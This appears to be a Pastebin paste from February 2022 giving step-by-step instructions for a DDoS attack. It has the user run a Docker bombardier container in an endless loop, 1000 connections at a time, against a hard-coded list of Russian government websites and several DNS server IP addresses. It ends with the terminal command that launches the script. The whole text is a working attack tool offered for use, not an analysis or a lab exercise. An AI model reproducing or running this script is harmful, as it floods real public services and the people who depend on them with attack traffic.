Advertisement
Guest User

Untitled

a guest
Feb 26th, 2022
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. Open the Docker Desktop application, then:
  2. 1. Click Images in the left sidebar
  3. 2. Search alpine
  4. 3. On the right will be the Run button - it must be pressed and run the image
  5.  
  6. Then copy the text below and save the file named ddos.sh to your desktop
  7.  
  8. Code:
  9.  
  10. #!/bin/bash -x
  11. DESTS=( "http://duma.gov.ru/" "http://president-sovet.ru/" "https://sovetnational.ru/" "https://www.gosuslugi.ru/ru/" "https://zakupki.gov.ru/epz/main/public/home.html" "https://gossluzhba.gov.ru/" "http://defence.council.gov.ru/" "http://budget.council.gov.ru/" "http://www.kremlin.ru/" "https://government.ru/" "http://www.scrf.gov.ru/" "http://www.ksrf.ru/ru/Pages/default.aspx" "http://www.vsrf.ru/" "http://premier.gov.ru/events/" "https://www.mchs.gov.ru/" "https://minjust.gov.ru/ru/" "http://www.fsb.ru/" "https://rosguard.gov.ru/" "https://customs.gov.ru/" "https://udprf.ru/" "http://favt.gov.ru/" "http://194.67.2.109:53/UDP" "http://194.67.7.1:53/UDP" "http://194.54.14.187:53/UDP" "http://194.54.14.186:53/UDP" )
  12. TIME="180s"
  13. while TRUE
  14. do
  15. for DEST in ${DESTS[@]}
  16. do
  17. docker run -ti --rm alpine/bombardier -c 1000 -d $TIME -l $DEST
  18. done
  19. done
  20.  
  21. Step 3. In the application "Terminal" we write the command:
  22.  
  23. cd Desktop / && chmod + x ddos.sh && sh ddos.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement